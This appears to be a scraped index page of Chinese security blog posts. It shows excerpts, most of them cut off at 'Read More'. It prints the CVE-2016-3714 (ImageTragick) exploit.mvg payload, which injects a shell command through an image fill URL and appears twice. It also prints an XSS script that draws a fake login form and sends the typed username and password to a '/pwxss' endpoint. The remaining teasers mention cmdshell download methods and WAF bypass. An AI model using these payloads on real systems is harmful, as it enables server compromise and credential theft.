CVE-2016-3714 exp
exploit.mvg
1 2 3 4 |
push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg;"|touch "/tmp/hacker.shell)' pop graphic-context |
exploit.sv… Read More »
exploit.mvg
1 2 3 4 |
push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg;"|touch "/tmp/hacker.shell)' pop graphic-context |
exploit.sv… Read More »
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
<script type="text/javascript"> ex_username = ''; ex_password = ''; inter = ''; function attack(){ ex_username = document.getElementById('username').value; ex_password = document.getElementById('password').value; if(ex_username != '' | ex_password != ''){ document.getElementById('xss').style.display = 'none' request=new XMLHttpRequest(); url = "/pwxss?username="+ex_username+"&password="+ex_password; request.open("GET",url,true); request.send(); document.getElementById('xss').style.visibility='hidden'; window.clearInterval(inter); } } document.write("\ <div id='xss'>\ <form method='post' action='index.php'>\ username:<input type='text' name='username' id='username' value='' autocomplete='on'>\ password:<input type='password' name='password' id='password' value='' autocomplete='on'>\ <input type='submit' name='login' value='Log In'>\ </form>\ </div>\ "); inter = window.setInterval("attack()",100); </script> |
转载自:https://labs.neoha… Read More »
本文指在记录一些cmdshell下的download方法,例如:sa权限的注射点。 0x1 bitsadmin… Read More »
0x1:waf拦截原理 0x2:绕过waf思路 0x3:burp插件代码实现原理 0x4:代码片段  … Read More »